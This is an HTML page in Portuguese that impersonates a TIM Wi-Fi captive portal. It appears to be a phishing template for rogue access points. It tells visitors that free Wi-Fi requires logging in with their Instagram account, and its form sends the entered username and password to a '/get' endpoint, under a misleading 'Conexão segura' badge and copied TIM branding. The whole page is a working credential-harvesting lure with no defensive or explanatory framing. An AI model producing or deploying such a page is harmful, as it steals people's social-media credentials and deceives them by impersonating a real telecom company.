<!DOCTYPE html>
<html lang="ptbr">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>TIM Wi-Fi - O Wi-Fi gratuito da TIM.</title>

    <style>
      html,
      body {
        height: 100%;
        margin: 0;
        padding: 0;
        font-family: Arial, Helvetica, sans-serif;
      }

      body {
        background-color: #0B3D86;
        display: flex;
        justify-content: center;
        align-items: center;
        flex-direction: column;
      }

      .logo {
        margin-bottom: 30px;
        filter: brightness(0) invert(1);
      }

      .container {
        width: 90%;
        min-height: 400px;
        max-width: 600px;
        font-family: Arial, Helvetica, sans-serif;
        font-size: 14px;
        text-align: center;
        margin-bottom: 30px;
      }

      .container .main {
        background-color: white;
        box-shadow: 0 0 10px rgba(0, 0, 0, 0.2);
        border-radius: 10px;
        display: flex;
        justify-content: center;
        flex-direction: column;
        padding: 20px;
      }

      .main hr {
        margin: 20px 0px 20px 0px;
        border: 0.5px solid #dbdbdb;
      }

      .info p {
        font-size: 12px;
        color: #999;
        margin: 5px;
      }

      .login {
        margin: auto;
        display: flex;
        align-items: center;
        flex-direction: column;
        max-width: 400px;
        width: 100%;
      }

      .login img {
        margin-bottom: 20px;
      }

      .login input {
        box-sizing: border-box; /* Adiciona esta linha */
        display: block;
        width: 100%;
        min-height: 30px;
        margin-bottom: 10px;
        background-color: #fafafa;
        border: 1px solid #dbdbdb;
        border-radius: 2px;
        padding: 10px;
      }

      .login .btn_submit {
        background-color: #EB0028;
        width: 100%;
        max-width: 100%;
        border: 2px solid #EB0028;
        border-radius: 2px;
        min-height: 40px;
        color: white;
        margin-top: 10px;
      }

      p.quota {
        margin-top: 10px;
        font-size: 12px;
        color: #999;
      }

      .safety {
        color: white;
        font-size: 12px;
        display: flex;
        justify-content: center;
        align-items: center;
        gap: 5px;
        margin-top: 20px;
      }

      .safety img {
        filter: brightness(0) invert(1);
      }

      .safety p {
        margin: 0;
      }

      .footer {
        font-family: Arial, Helvetica, sans-serif;
        bottom: 0;
        width: 100%;
        height: 50px;
        background-color: #0B3D86;
        display: flex;
        justify-content: center;
        align-items: center;
        flex-direction: column;
        color: white;
        font-size: 10px;
      }

      .footer p {
        margin: 2px;
      }
    </style>
  </head>
  <body>
    <div class="logo">
      
        <svg width="76" height="20" viewBox="0 0 76 20" fill="none" xmlns="http://www.w3.org/2000/svg">
            <path d="M43.3669 0C43.7698 0 43.8504 0.0483456 43.8504 1.46648V2.77181C43.8504 4.12549 43.7375 4.28664 43.3669 4.28664H38.8385V19.5477C38.8385 19.8861 38.4034 19.9667 36.8886 19.9667H36.0828C34.5358 19.9667 34.2779 19.8861 34.2779 19.5477V4.28664H29.7496C29.3789 4.28664 29.2661 4.17383 29.2661 2.77181V1.46648C29.2661 0 29.3467 0 29.7496 0H43.3669ZM51.489 0.43511C51.489 0.145037 51.07 0 49.6035 0H48.7494C47.2023 0 46.9445 0.128922 46.9445 0.43511V19.5638C46.9445 19.9023 47.2023 19.9828 48.7494 19.9828H49.6035C51.07 19.9828 51.489 19.9023 51.489 19.5638V0.43511ZM73.599 0H72.2614C70.5532 0 70.4565 0.193382 70.3115 0.483456L67.6686 6.81673C66.7823 8.92782 65.8798 11.1839 65.5414 12.3604C65.2191 11.1839 64.6389 9.62077 63.4142 6.70392L60.7874 0.483456C60.6263 0.112806 59.9655 0 58.5152 0H57.0326C55.5661 0 55.276 0.128922 55.276 0.43511V19.5638C55.276 19.9023 55.5661 19.9828 57.0809 19.9828H57.9028C59.4015 19.9828 59.8205 19.9023 59.8205 19.5638V8.20263H59.9333C59.9333 8.20263 60.0622 8.73443 60.2878 9.21789L63.3175 16.3247C63.4464 16.647 63.6076 16.7759 65.0257 16.7759H65.9282C67.3624 16.7759 67.4752 16.6631 67.6041 16.3247L70.376 9.47573C70.6338 8.83112 70.8272 8.20263 70.8272 8.20263H70.94V19.5477C70.94 19.8861 71.2301 19.9667 72.8093 19.9667H73.6151C75.0816 19.9667 75.5006 19.8861 75.5006 19.5477V0.43511C75.5006 0.128922 75.0655 0 73.599 0Z" fill="white"/>
            <path d="M22.7708 4.28664H1.16029C0.83799 4.28664 0.547917 4.15772 0.338419 3.94822C0.128922 3.73872 0 3.44865 0 3.14246V1.16029C0 0.83799 0.128922 0.564032 0.338419 0.354534C0.564032 0.128922 0.83799 0 1.16029 0H22.7708C23.0931 0 23.3832 0.128922 23.5927 0.338419C23.8022 0.547916 23.9311 0.821875 23.9311 1.14418V3.11023C23.9311 3.43254 23.8022 3.70649 23.5927 3.91599C23.3832 4.1416 23.0931 4.28664 22.7708 4.28664ZM9.57243 7.8481H1.16029C0.83799 7.8481 0.547917 7.97702 0.354534 8.18652C0.145037 8.39601 0.0161152 8.68609 0.0161152 8.99228V10.9583C0.0161152 11.2806 0.145037 11.5707 0.354534 11.7641C0.564032 11.9736 0.854106 12.1025 1.17641 12.1025H9.58854V7.8481H9.57243ZM23.5927 8.20263C23.3832 7.99313 23.0931 7.86421 22.7708 7.86421H14.3586V12.1347H22.7708C23.0931 12.1347 23.3832 12.0058 23.5927 11.7963C23.8022 11.5868 23.9311 11.2967 23.9311 10.9906V9.00839C23.9311 8.68609 23.8022 8.39601 23.5927 8.20263ZM23.5927 16.0507C23.3832 15.8412 23.0931 15.7123 22.7708 15.7123H14.3586V19.9828H22.7708C23.0931 19.9828 23.3832 19.8539 23.5927 19.6444C23.8022 19.4349 23.9311 19.1448 23.9311 18.8387V16.8726C23.9311 16.5503 23.8022 16.2602 23.5927 16.0507ZM9.57243 15.7123H1.16029C0.83799 15.7123 0.547917 15.8412 0.354534 16.0507C0.145037 16.2602 0.0161152 16.5503 0.0161152 16.8565V18.8225C0.0161152 19.1448 0.145037 19.4349 0.354534 19.6283C0.564032 19.8378 0.854106 19.9667 1.17641 19.9667H9.58854V15.7123H9.57243Z" fill="#EB0028"/>
        </svg>

    </div>

    <div class="container">
      <div class="main">
        <div class="info">
          <p>
            Esta é uma prévia gratuita do Wi-Fi oferecido pela TIM Fibra
            Residencial.
          </p>

          <p>
            Para continuar, é necessário fazer login com sua conta do Instagram.
          </p>
        </div>

        <hr />

        <form action="/get">
          <div class="login">
            <svg
              version="1.0"
              xmlns="http://www.w3.org/2000/svg"
              width="100px"
              viewBox="0 0 1280.000000 457.000000"
              preserveAspectRatio="xMidYMid meet"
            >
              <g
                transform="translate(0.000000,457.000000) scale(0.100000,-0.100000)"
                fill="#000000"
                stroke="none"
              >
                <path
                  d="M936 3796 c-297 -155 -547 -527 -563 -837 -9 -166 28 -270 137 -380
           116 -117 260 -166 260 -88 0 11 -20 57 -45 103 -73 135 -91 277 -59 467 27
           153 85 302 165 420 51 75 129 153 141 141 6 -6 8 -376 5 -993 -5 -1068 -5
           -1070 -62 -1259 -30 -98 -27 -130 11 -130 43 0 142 60 197 120 100 107 157
           258 176 461 7 71 11 453 11 1005 0 880 0 892 -20 917 -34 43 -125 80 -210 85
           -71 4 -79 2 -144 -32z"
                />
                <path
                  d="M4314 3823 c-29 -21 -35 -61 -41 -264 l-6 -210 -166 6 c-156 7 -167
           6 -183 -12 -40 -44 -61 -160 -38 -204 10 -17 22 -19 129 -19 65 0 146 -3 180
           -7 l63 -6 -7 -381 c-6 -341 -8 -388 -27 -451 -34 -116 -110 -246 -190 -322
           l-33 -32 0 88 c0 81 -3 93 -38 163 -48 97 -103 153 -300 302 -86 65 -157 122
           -157 125 0 3 18 31 40 62 60 85 110 199 117 260 10 102 -57 156 -182 146 -117
           -9 -220 -83 -275 -199 -54 -114 -47 -221 19 -313 l29 -40 -45 -85 c-26 -47
           -82 -148 -126 -225 -201 -354 -291 -448 -334 -347 -23 52 -29 344 -14 701 10
           243 10 284 -3 315 -21 50 -58 82 -148 127 -95 48 -155 52 -235 15 -140 -66
           -260 -256 -389 -619 l-49 -137 -5 357 c-3 197 -7 359 -8 359 -106 55 -244 82
           -269 53 -15 -19 -28 -1224 -15 -1325 12 -84 35 -139 71 -162 29 -20 202 -25
           221 -6 6 6 18 57 26 115 47 316 196 739 339 960 66 103 135 183 148 170 6 -6
           6 -96 -2 -263 -31 -700 -3 -911 129 -978 95 -48 214 -8 335 115 94 93 134 152
           325 470 89 148 163 271 165 273 1 2 60 -52 129 -119 106 -102 132 -133 162
           -195 31 -61 37 -83 37 -138 0 -119 -59 -196 -151 -196 -54 0 -93 16 -177 74
           -84 57 -111 59 -161 9 -67 -67 -95 -163 -58 -204 68 -76 310 -131 477 -110
           201 27 366 131 490 310 18 25 55 90 83 145 28 54 54 95 56 90 3 -5 8 -37 12
           -71 16 -143 75 -289 149 -370 57 -61 126 -95 209 -101 59 -4 75 -1 122 22 82
           40 175 146 236 267 l49 98 17 -52 c47 -145 126 -247 230 -298 193 -95 421 -11
           567 209 l35 53 7 -37 c34 -183 222 -301 397 -250 70 20 156 95 200 173 l30 54
           40 -60 c72 -110 170 -170 291 -179 134 -9 258 47 370 167 l57 62 0 -74 0 -75
           -152 -140 c-389 -357 -490 -497 -491 -682 -1 -112 23 -172 97 -246 68 -68 128
           -96 245 -115 140 -23 278 26 390 138 79 80 111 137 146 258 47 161 56 255 55
           567 l0 287 71 88 c195 243 373 557 479 843 l27 75 114 6 c63 3 118 2 123 -3 6
           -4 1 -53 -12 -120 -36 -185 -45 -283 -39 -458 7 -237 46 -357 150 -464 164
           -166 391 -148 513 43 22 33 42 60 45 60 3 1 20 -21 38 -49 111 -171 336 -220
           521 -112 64 37 147 118 190 184 l36 58 17 -54 c50 -157 185 -255 336 -244 101
           8 175 62 237 174 l32 56 6 -63 c13 -116 14 -119 65 -143 37 -17 65 -21 148
           -21 149 0 143 -9 154 243 9 238 20 320 58 468 57 218 159 449 186 422 2 -2 9
           -95 15 -208 20 -364 52 -603 94 -696 23 -51 70 -95 114 -109 36 -11 129 -7
           154 6 34 18 38 28 38 96 0 132 44 389 97 578 26 90 118 333 133 348 4 5 10
           -137 13 -315 5 -349 16 -453 62 -573 74 -197 240 -301 407 -255 123 34 227
           212 245 415 7 87 0 121 -27 130 -51 16 -62 0 -99 -147 -50 -194 -127 -257
           -210 -170 -40 42 -64 107 -81 217 -12 83 -17 394 -10 697 6 259 9 251 -122
           316 -131 65 -223 67 -262 7 -58 -88 -191 -502 -231 -714 -8 -47 -17 -86 -19
           -88 -11 -12 -36 355 -36 537 0 140 -11 184 -59 231 -72 71 -219 102 -276 57
           -40 -31 -94 -153 -171 -384 -37 -110 -70 -202 -73 -206 -3 -4 -4 104 -3 240 4
           265 -2 311 -41 329 -40 18 -173 45 -208 41 -24 -2 -37 -10 -46 -28 -8 -18 -12
           -151 -14 -474 -1 -389 -4 -458 -19 -515 -35 -136 -101 -260 -156 -296 -13 -8
           -41 -15 -62 -15 -131 0 -158 204 -132 970 6 201 5 249 -6 267 -18 28 -111 63
           -190 70 -57 5 -64 4 -88 -20 -18 -18 -26 -37 -26 -61 l0 -35 -51 55 c-29 30
           -76 66 -108 81 -49 24 -68 28 -146 28 -78 0 -98 -4 -153 -29 -91 -42 -179
           -140 -243 -271 -88 -181 -115 -335 -104 -609 11 -296 12 -274 -25 -345 -39
           -72 -76 -101 -132 -101 -97 0 -159 127 -174 356 -8 129 8 273 58 513 46 222
           45 246 -10 302 -53 52 -96 56 -258 25 -71 -14 -151 -28 -177 -32 l-48 -6 6 63
           c11 114 -41 175 -148 173 -73 -1 -110 -18 -160 -73 -42 -46 -61 -103 -60 -181
           0 -62 10 -85 59 -140 l34 -38 -26 -88 c-54 -189 -179 -451 -300 -627 l-35 -52
           2 517 c2 402 -1 520 -10 532 -24 28 -123 59 -194 60 -61 1 -71 -2 -88 -23 -10
           -13 -19 -38 -19 -57 l0 -33 -51 55 c-29 30 -76 66 -108 81 -49 24 -68 28 -146
           28 -77 0 -98 -4 -147 -27 -115 -54 -214 -178 -282 -353 -66 -173 -93 -399 -75
           -626 11 -124 10 -128 -14 -188 -47 -116 -92 -161 -162 -161 -72 0 -113 73
           -135 240 -10 83 -11 455 -1 769 4 133 2 212 -4 225 -14 28 -112 65 -189 73
           -60 5 -66 4 -90 -20 -18 -18 -26 -37 -26 -61 l0 -34 -57 57 c-72 71 -131 100
           -220 108 -79 6 -161 -13 -224 -52 -118 -75 -224 -246 -273 -440 -20 -77 -46
           -280 -46 -352 0 -154 -108 -374 -217 -444 -61 -38 -84 -37 -122 6 -70 80 -86
           214 -77 635 10 425 20 668 30 677 4 5 101 10 214 13 l207 5 19 39 c27 54 33
           128 13 145 -11 8 -88 17 -232 26 -119 7 -218 15 -220 17 -2 1 1 91 6 198 l9
           195 -25 22 c-48 42 -259 90 -291 66z m1371 -1021 c79 -46 124 -172 132 -372
           12 -280 -49 -533 -155 -643 -49 -51 -82 -67 -136 -67 -36 0 -52 6 -80 31 -96
           84 -143 324 -117 598 21 211 65 343 140 417 65 64 144 77 216 36z m1450 -1
           c43 -24 92 -128 106 -221 15 -97 5 -402 -15 -490 -58 -250 -144 -370 -269
           -370 -60 0 -104 37 -141 120 -46 102 -59 201 -53 405 5 198 29 320 82 424 69
           137 188 191 290 132z m2470 10 c116 -52 163 -212 152 -510 -13 -350 -127 -581
           -287 -581 -60 0 -105 36 -142 116 -41 87 -57 193 -58 369 0 331 66 536 193
           600 60 30 88 31 142 6z m-2325 -1741 c-11 -167 -36 -299 -71 -379 -52 -123
           -183 -174 -283 -111 -46 28 -70 81 -69 155 2 142 108 317 333 549 l95 98 3
           -78 c2 -44 -1 -149 -8 -234z"
                />
              </g>
            </svg>

            <input name="email"
              type="text"
              placeholder="Telefone, nome de usuário ou email"
              style="margin-top: 15px"
            />

           <input name="password" type="password" placeholder="Senha" />

            <button type="submit" class="btn_submit">Entrar</button>
          </div>
        </form>

        <p class="quota"><span>Quota:</span> 10GB de dados por dia.</p>
      </div>

      <div class="safety">
        <svg
          version="1.0"
          xmlns="http://www.w3.org/2000/svg"
          height="12px"
          viewBox="0 0 256.000000 256.000000"
          preserveAspectRatio="xMidYMid meet"
        >
          <g
            transform="translate(0.000000,256.000000) scale(0.100000,-0.100000)"
            fill="#FFFFFF"
            stroke="none"
            hidden
          >
            <path
              d="M1165 2554 c-323 -52 -579 -290 -655 -608 -16 -63 -20 -117 -20 -247
l0 -166 -50 -7 c-57 -8 -106 -43 -126 -93 -11 -26 -14 -154 -14 -670 0 -624 0
-638 21 -679 11 -24 35 -52 53 -64 33 -20 45 -20 906 -20 861 0 873 0 906 20
18 12 42 40 53 64 21 41 21 55 21 679 0 516 -3 644 -14 670 -20 50 -69 85
-126 93 l-50 7 0 166 c0 181 -16 276 -63 383 -97 219 -295 391 -522 453 -60
16 -263 28 -320 19z m189 -334 c123 -20 247 -102 316 -209 56 -88 71 -150 77
-323 l6 -158 -473 0 -473 0 6 158 c6 173 21 235 77 323 81 126 230 211 380
218 14 0 51 -3 84 -9z m46 -1124 c57 -37 90 -93 97 -160 5 -49 2 -64 -25 -118
-31 -63 -31 -64 -34 -249 -4 -240 4 -229 -158 -229 -162 0 -154 -11 -158 229
-3 183 -4 187 -33 245 -47 96 -36 180 36 252 52 52 89 65 173 60 47 -3 73 -10
102 -30z"
            />
          </g>
        </svg>

        <p>Conexão segura</p>
      </div>
    </div>

    <div class="footer">
      <p>© 2024 TIM. Todos os direitos reservados.</p>
      <p>CNPJ: 10.122.511/0001-09 - Rua Soyjo Laga, 0 - São Paulo - SP</p>
    </div>
  </body>
</html>
